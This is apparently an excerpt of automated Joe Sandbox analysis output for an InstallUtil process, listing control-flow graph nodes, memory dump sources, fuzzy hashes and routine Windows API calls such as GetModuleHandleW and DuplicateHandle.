GetCurrentProcess 23346->23349 23347->23346 23348->23349 23350 13e664b 23349->23350 23351 13e6673 GetCurrentThreadId 23350->23351 23352 13e66a4 23351->23352

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 482 786a620-786a63c 483 786a6c6-786a71f 482->483 484 786a642-786a64f 482->484 501 786a725-786a72b 483->501 502 786a7e0-786a841 483->502 487 786a666-786a672 484->487 488 786a651-786a65c 484->488 493 786a674-786a698 487->493 494 786a69a 487->494 634 786a65f call 786a040 488->634 635 786a65f call 7869f98 488->635 636 786a65f call 7869f89 488->636 491 786a661-786a664 495 786a6a3-786a6c3 491->495 493->494 493->495 494->495 503 786a755-786a766 501->503 504 786a72d-786a730 501->504 521 786a843-786a86a 502->521 522 786a86b-786a8b9 502->522 509 786a76e-786a772 503->509 510 786a768 503->510 505 786a732-786a754 504->505 506 786a7ab-786a7d9 504->506 506->502 513 786a77a-786a7aa 509->513 510->513 514 786a76a-786a76c 510->514 514->509 514->513 527 786a8bb-786a8c4 call 786a4c8 522->527 528 786a8c9-786a8cd 522->528 527->528 530 786a8e3-786a8f4 528->530 531 786a8cf-786a8de 528->531 533 786adf2-786ae12 530->533 534 786a8fa-786a90f 530->534 532 786ac78-786ac7f 531->532 541 786ae14-786ae18 533->541 542 786ae2b-786ae76 533->542 535 786a911-786a916 534->535 536 786a91b-786a92e 534->536 535->532 537 786a934-786a940 536->537 538 786ac80-786ac9e 536->538 537->533 540 786a946-786a97d 537->540 549 786aca5-786acc3 538->549 543 786a97f-786a984 540->543 544 786a989-786a98d 540->544 546 786ae1a-786ae25 541->546 547 786ae28-786ae2a 541->547 572 786ae85-786ae8a 542->572 573 786ae78-786ae84 542->573 543->532 544->549 550 786a993-786a99f 544->550 546->547 559 786acca-786ace8 549->559 550->533 551 786a9a5-786a9dc 550->551 556 786a9de-786a9e3 551->556 557 786a9e8-786a9ec 551->557 556->532 558 786a9f2-786a9fe 557->558 557->559 558->533 563 786aa04-786aa3b 558->563 568 786acef-786ad0d 559->568 565 786aa47-786aa4b 563->565 566 786aa3d-786aa42 563->566 567 786aa51-786aa5d 565->567 565->568 566->532 567->533 571 786aa63-786aa9a 567->571 580 786ad14-786ad32 568->580 575 786aaa6-786aaaa 571->575 576 786aa9c-786aaa1 571->576 578 786ae8c-786ae8f 572->578 579 786aec8-786aecc 572->579 575->580 581 786aab0-786aabc 575->581 576->532 583 786aebd-786aec6 578->583 594 786ad39-786ad57 580->594 581->533 586 786aac2-786aaf9 581->586 583->579 587 786ae91-786aea5 583->587 588 786ab05-786ab09 586->588 589 786aafb-786ab00 586->589 595 786aea7-786aebb call 7862340 587->595 596 786aebc 587->596 593 786ab0f-786ab1b 588->593 588->594 589->532 593->533 597 786ab21-786ab58 593->597 604 786ad5e-786ad7c 594->604 596->583 601 786ab64-786ab68 597->601 602 786ab5a-786ab5f 597->602 601->604 605 786ab6e-786ab7a 601->605 602->532 612 786ad83-786ada1 604->612 605->533 608 786ab80-786abb7 605->608 610 786abc3-786abc7 608->610 611 786abb9-786abbe 608->611 610->612 613 786abcd-786abd9 610->613 611->532 620 786ada8-786adc6 612->620 613->533 615 786abdf-786ac16 613->615 618 786ac1f-786ac23 615->618 619 786ac18-786ac1d 615->619 618->620 621 786ac29-786ac32 618->621 619->532 626 786adcd-786adeb 620->626 621->533 624 786ac38-786ac6d 621->624 625 786ac73 624->625 624->626 625->532 626->533 634->491 635->491 636->491
                              Memory Dump Source
                              • Source File: 00000008.00000002.2043826099.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_7860000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6c1b10b13c58ee35410a80b03cdbc7519d5223c13ea55988583df6b43114b19a
                              • Instruction ID: 6b26e90733e804327a62cb36aa464cc0506d1357d875f01b588a3ab1728e9fff
                              • Opcode Fuzzy Hash: 6c1b10b13c58ee35410a80b03cdbc7519d5223c13ea55988583df6b43114b19a
                              • Instruction Fuzzy Hash: 6C426AB4B007169FDB18CF69C49876EBBF2BF88300F148529D55AE7381DB34A841CB96
                              Memory Dump Source
                              • Source File: 00000008.00000002.2043826099.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_7860000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cdb40366e768a2ea9d3bef925fccf47276ac003b8f38bacd2afeda240c553289
                              • Instruction ID: 3d812da084a65b1aa8474a8d118382ec469d8761f283f6249e9f933ae23e0c61
                              • Opcode Fuzzy Hash: cdb40366e768a2ea9d3bef925fccf47276ac003b8f38bacd2afeda240c553289
                              • Instruction Fuzzy Hash: 7EE1DDB17013159FEB2ADF79C4587AEB7F6AF99300F144469D186DB290CB34E901CBA1

                              Control-flow Graph

                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 013E65BE
                              • GetCurrentThread.KERNEL32 ref: 013E65FB
                              • GetCurrentProcess.KERNEL32 ref: 013E6638
                              • GetCurrentThreadId.KERNEL32 ref: 013E6691
                              Memory Dump Source
                              • Source File: 00000008.00000002.1943605364.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_13e0000_InstallUtil.jbxd
                              Similarity
                              • API ID: Current$ProcessThread
                              • String ID:
                              • API String ID: 2063062207-0
                              • Opcode ID: a90408d1ef090df15b00f361ae717e319fa3b4abb483ce03e71e40d022a3f83d
                              • Instruction ID: 927a71ab4e482ecc2bd9043d4339bc464c9644b647b700b54dfbed3bc8843d15
                              • Opcode Fuzzy Hash: a90408d1ef090df15b00f361ae717e319fa3b4abb483ce03e71e40d022a3f83d
                              • Instruction Fuzzy Hash: A16187B0910709CFEB14DFA9D54979EBFF0AF48308F20855AE009A7391DB759944CB65

                              Control-flow Graph

                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 013E65BE
                              • GetCurrentThread.KERNEL32 ref: 013E65FB
                              • GetCurrentProcess.KERNEL32 ref: 013E6638
                              • GetCurrentThreadId.KERNEL32 ref: 013E6691
                              Memory Dump Source
                              • Source File: 00000008.00000002.1943605364.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_13e0000_InstallUtil.jbxd
                              Similarity
                              • API ID: Current$ProcessThread
                              • String ID:
                              • API String ID: 2063062207-0
                              • Opcode ID: e501fd97eb4fee3375446b0a3f596f20806e611d01524555473644872ed1ad85
                              • Instruction ID: ffcb5c96c3b33dcd3825d4c94c79cd1acb37a8bbfe64fe204d567e272552024a
                              • Opcode Fuzzy Hash: e501fd97eb4fee3375446b0a3f596f20806e611d01524555473644872ed1ad85
                              • Instruction Fuzzy Hash: 795157B0910709CFEB14DFA9D548B9EBBF1EF88314F208459E419A7390DB74A944CF65

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 47 13ebff0-13ec00f 48 13ec03b-13ec03f 47->48 49 13ec011-13ec01e call 13eaf60 47->49 51 13ec053-13ec094 48->51 52 13ec041-13ec04b 48->52 54 13ec034 49->54 55 13ec020 49->55 58 13ec096-13ec09e 51->58 59 13ec0a1-13ec0af 51->59 52->51 54->48 102 13ec026 call 13ec698 55->102 103 13ec026 call 13ec660 55->103 58->59 60 13ec0d3-13ec0d5 59->60 61 13ec0b1-13ec0b6 59->61 66 13ec0d8-13ec0df 60->66 63 13ec0b8-13ec0bf call 13eaf6c 61->63 64 13ec0c1 61->64 62 13ec02c-13ec02e 62->54 65 13ec170-13ec230 62->65 68 13ec0c3-13ec0d1 63->68 64->68 97 13ec238-13ec263 GetModuleHandleW 65->97 98 13ec232-13ec235 65->98 69 13ec0ec-13ec0f3 66->69 70 13ec0e1-13ec0e9 66->70 68->66 72 13ec0f5-13ec0fd 69->72 73 13ec100-13ec109 call 13eaf7c 69->73 70->69 72->73 78 13ec10b-13ec113 73->78 79 13ec116-13ec11b 73->79 78->79 80 13ec11d-13ec124 79->80 81 13ec139-13ec146 79->81 80->81 83 13ec126-13ec136 call 13eaf8c call 13eaf9c 80->83 88 13ec148-13ec166 81->88 89 13ec169-13ec16f 81->89 83->81 88->89 99 13ec26c-13ec280 97->99 100 13ec265-13ec26b 97->100 98->97 100->99 102->62 103->62
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000), ref: 013EC256
                              Memory Dump Source
                              • Source File: 00000008.00000002.1943605364.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_13e0000_InstallUtil.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: 446f135d09425308abaf371e04763386eef8780a25f86dc32283ad02c818adf0
                              • Instruction ID: 4ef282912ea6e5b440c3c305eac849da0cd16ef16331da869d79a2f233fa25c9
                              • Opcode Fuzzy Hash: 446f135d09425308abaf371e04763386eef8780a25f86dc32283ad02c818adf0
                              • Instruction Fuzzy Hash: 3C8139B0A00B158FE725DF69D44975ABBF1FF88208F10892DD48AD7B80D775E849CB91

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 104 13e7364-13e736c 105 13e7370-13e7431 CreateActCtxA 104->105 107 13e743a-13e7494 105->107 108 13e7433-13e7439 105->108 115 13e7496-13e7499 107->115 116 13e74a3-13e74a7 107->116 108->107 115->116 117 13e74b8 116->117 118 13e74a9-13e74b5 116->118 120 13e74b9 117->120 118->117 120->120
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 013E7421
                              Memory Dump Source
                              • Source File: 00000008.00000002.1943605364.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_13e0000_InstallUtil.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: a3fa47f278d00cc2d646a33593030a18ea9c6c2bf0575d9ea3a4913729bcca66
                              • Instruction ID: 298b209fa4b0437fff9b91815a8cde836f8361e5fe5a0490a37074376db80015
                              • Opcode Fuzzy Hash: a3fa47f278d00cc2d646a33593030a18ea9c6c2bf0575d9ea3a4913729bcca66
                              • Instruction Fuzzy Hash: B141AF71C00729CBEB25DFA9C848BDEBBF5BF45704F20806AD408AB255DBB56945CF90

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 121 13e6414-13e7431 CreateActCtxA 124 13e743a-13e7494 121->124 125 13e7433-13e7439 121->125 132 13e7496-13e7499 124->132 133 13e74a3-13e74a7 124->133 125->124 132->133 134 13e74b8 133->134 135 13e74a9-13e74b5 133->135 137 13e74b9 134->137 135->134 137->137
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 013E7421
                              Memory Dump Source
                              • Source File: 00000008.00000002.1943605364.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_13e0000_InstallUtil.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: 3132eff094a2eb5691c4a631f752dc2780198185dfe8a58b2fc96881fc53c058
                              • Instruction ID: ee43d1be4d27dc54ebf0df446237677cea737182f73507c6c6bfd4c5d6c064ea
                              • Opcode Fuzzy Hash: 3132eff094a2eb5691c4a631f752dc2780198185dfe8a58b2fc96881fc53c058
                              • Instruction Fuzzy Hash: 4D417E70C047298BEB24DFA9C848BDEBBF5BF49704F20806AD418AB255DBB56945CF90

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 138 13e6780-13e6783 140 13e6788-13e681c DuplicateHandle 138->140 141 13e681e-13e6824 140->141 142 13e6825-13e6842 140->142 141->142
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013E680F
                              Memory Dump Source
                              • Source File: 00000008.00000002.1943605364.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_13e0000_InstallUtil.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 0cd2681e1808719a73d520862ebbb499c71c01ac9a801d34af7e40f11ea4d898
                              • Instruction ID: 699786c0f1ca6ea3b2b36d2596e3aea96b925d16b070c3d1255ec7a6644589b8
                              • Opcode Fuzzy Hash: 0cd2681e1808719a73d520862ebbb499c71c01ac9a801d34af7e40f11ea4d898
                              • Instruction Fuzzy Hash: 9821F3B5D00319AFDB10CF9AD884ADEBBF8EB48324F14841AE918A3751D374A940CFA5

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 145 13e6788-13e681c DuplicateHandle 146 13e681e-13e6824 145->146 147 13e6825-13e6842 145->147 146->147
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013E680F
                              Memory Dump Source
                              • Source File: 00000008.00000002.1943605364.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_13e0000_InstallUtil.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 828c21698d8b530ba62cdf6c511e5955c2def263d10b7a908276f6db455b4d85
                              • Instruction ID: 248f26a4aeae4c83b5ab20a400caf58e6438a256094cc40a58f6e4e423878af7
                              • Opcode Fuzzy Hash: 828c21698d8b530ba62cdf6c511e5955c2def263d10b7a908276f6db455b4d85
                              • Instruction Fuzzy Hash: 0521E4B5900309AFDB10CFAAD884ADEBFF4FB48310F14841AE914A3350D374A944CFA1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 150 13ec1f0-13ec230 151 13ec238-13ec263 GetModuleHandleW 150->151 152 13ec232-13ec235 150->152 153 13ec26c-13ec280 151->153 154 13ec265-13ec26b 151->154 152->151 154->153
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000), ref: 013EC256
                              Memory Dump Source
                              • Source File: 00000008.00000002.1943605364.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_13e0000_InstallUtil.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: f41738f4b209bfa219bdf62ab0e736d51c2bd34db93aacac4f0e13da4771cccc
                              • Instruction ID: e0e0a339fde933c833d98dff8332b3a19616d052219a2f5e69fd536ba21866d3
                              • Opcode Fuzzy Hash: f41738f4b209bfa219bdf62ab0e736d51c2bd34db93aacac4f0e13da4771cccc
                              • Instruction Fuzzy Hash: D5110FB5C003498FDB10DF9AC448A9EFBF4EB88214F10842AD829A7650D379A545CFA1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 156 786c528-786c59a PostMessageW 159 786c5a3-786c5b7 156->159 160 786c59c-786c5a2 156->160 160->159
                              APIs
                              • PostMessageW.USER32(?,?,?,?), ref: 0786C58D
                              Memory Dump Source
                              • Source File: 00000008.00000002.2043826099.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_7860000_InstallUtil.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              • Opcode ID: c98728917a197071c96e6f5fa3ec650be97924dc76519c25f99a3368c1701035
                              • Instruction ID: ca6675a6c55e026868a04e1e93651d9c9dff869dba19d8e39d4906008dbd965d
                              • Opcode Fuzzy Hash: c98728917a197071c96e6f5fa3ec650be97924dc76519c25f99a3368c1701035
                              • Instruction Fuzzy Hash: 9D1106B5800349AFDB10DF9AD849BDEFBF8FB48314F108419E558A7200D375A544CFA1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 162 786c530-786c59a PostMessageW 163 786c5a3-786c5b7 162->163 164 786c59c-786c5a2 162->164 164->163
                              APIs
                              • PostMessageW.USER32(?,?,?,?), ref: 0786C58D
                              Memory Dump Source
                              • Source File: 00000008.00000002.2043826099.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_7860000_InstallUtil.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              • Opcode ID: 5acdade33211c87e7952314aeabb2f295d5c7f1763bd587d4e41e4695a1eacc5
                              • Instruction ID: 389c7aa562818e7385b9bb2a7078ef93e1fc20f376921299963c3adc048f2b4b
                              • Opcode Fuzzy Hash: 5acdade33211c87e7952314aeabb2f295d5c7f1763bd587d4e41e4695a1eacc5
                              • Instruction Fuzzy Hash: E411E5B58003499FDB10DF9AD889BDEFBF8FB48310F10841AD958A7650D375A944CFA1
                              Memory Dump Source
                              • Source File: 00000008.00000002.1942959805.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_134d000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4ee911d4456c2703ea725cd8db80a3dae64a1a8f1723deb006ec3a759cd0c786
                              • Instruction ID: 01dd9f7e3799e8fc50c3af28ee7a71b608a1099726390cc148f79c688cf5fbc5
                              • Opcode Fuzzy Hash: 4ee911d4456c2703ea725cd8db80a3dae64a1a8f1723deb006ec3a759cd0c786
                              • Instruction Fuzzy Hash: 0D212571500344DFDB05DF94D9C0B26BBA5FB9831CF2481ADE90A4B256C736E856CBE2
                              Memory Dump Source
                              • Source File: 00000008.00000002.1943123152.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_135d000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 52e6b155fd54c523d3a1db843cdaeed70c81550bb09a5b1e65009cdf4819f6e2
                              • Instruction ID: 061fc2ac6d32ca62bb29ad810a8228a2ebbe10799a507bd3d897c4754b7af6ad
                              • Opcode Fuzzy Hash: 52e6b155fd54c523d3a1db843cdaeed70c81550bb09a5b1e65009cdf4819f6e2
                              • Instruction Fuzzy Hash: F3210071604344DFDB55DF54D8C0F26BB65FB84618F24C569DC0A4B286C33AD807CAA2
                              Memory Dump Source
                              • Source File: 00000008.00000002.1943123152.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_135d000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c80ce70c0445d3f1dfd58f3bdfecc2b8a45dcc7f2f35eca2ec4e315ccd07f247
                              • Instruction ID: 4b73ad5cfdebd009e1f4fa23566e5fb337b93718527bf2f8182d8483fad6d5b6
                              • Opcode Fuzzy Hash: c80ce70c0445d3f1dfd58f3bdfecc2b8a45dcc7f2f35eca2ec4e315ccd07f247
                              • Instruction Fuzzy Hash: DF21A1755093808FDB03CF64D9D0B15BF71EB45218F28C5EAD8498B6A7C33AD44ACB62
                              Memory Dump Source
                              • Source File: 00000008.00000002.1942959805.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_134d000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                              • Instruction ID: 501963d05c4512df75eb3bb1a86c7f642d812babb7731f2ca3f37cd4b6f0fb98
                              • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                              • Instruction Fuzzy Hash: 8611E172404240CFCB02CF44D5C0B16BFB1FB94318F2482E9D8090B257C33AE456CBA1
                              Memory Dump Source
                              • Source File: 00000008.00000002.1942959805.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_134d000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f4757bb4c213fa937b92420a67ed8429236f33b9e8d98a7968fd0351f6d549f8
                              • Instruction ID: 2433f320e0675eaebbde37eb4d80f884ebc11e41d5dccf3d106c5193e739f489
                              • Opcode Fuzzy Hash: f4757bb4c213fa937b92420a67ed8429236f33b9e8d98a7968fd0351f6d549f8
                              • Instruction Fuzzy Hash: 03F0F976200604AFD7209F0AD884C23FBEDEBD4674755C55AEC4A4B612C675FC41CEA0
                              Memory Dump Source
                              • Source File: 00000008.00000002.1942959805.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_134d000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8cde09d479f7c77b6b75ea6dda73f6b087fa054f81944a9af4428912cd9879c1
                              • Instruction ID: 1f6f2930d83addd890fd27cdc48ca0dc096fc46089a2bbe55b87bd028ee1e4cf
                              • Opcode Fuzzy Hash: 8cde09d479f7c77b6b75ea6dda73f6b087fa054f81944a9af4428912cd9879c1
                              • Instruction Fuzzy Hash: D7F03779104680AFD325CF16C884C22BBF9EF9966071A8489E84A8B762C675FC42CF60
                              Memory Dump Source
                              • Source File: 00000008.00000002.1943605364.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_13e0000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: acb6253187d34f85b72e44e9ac15a64b503136a2fa267e2c374e095be9adb017
                              • Instruction ID: 6da53d91d0637c5a071cf23cc0787a489fcdecd112416103ac979934d3124f4b
                              • Opcode Fuzzy Hash: acb6253187d34f85b72e44e9ac15a64b503136a2fa267e2c374e095be9adb017
                              • Instruction Fuzzy Hash: 1FA15032A0031ACFCF05DFB8D4485AEBBF6FF85304B15856AE905AB2A1DBB1D955CB40
                              Memory Dump Source
                              • Source File: 00000008.00000002.2043826099.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_7860000_InstallUtil.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0c0d2e44d8eb7b21835fdff266732808fadadaee68935279ed0df5fc5cf36bc3
                              • Instruction ID: ca0d37b27651b7823ccebf8f0b3ed0decc27c0fa9d5bf535962a0f72f8191f2c
                              • Opcode Fuzzy Hash: 0c0d2e44d8eb7b21835fdff266732808fadadaee68935279ed0df5fc5cf36bc3
                              • Instruction Fuzzy Hash: 43911A797012059FD704EF39D994A6E77A2AF89750F208069EA11CF3B4EB71EC01CB90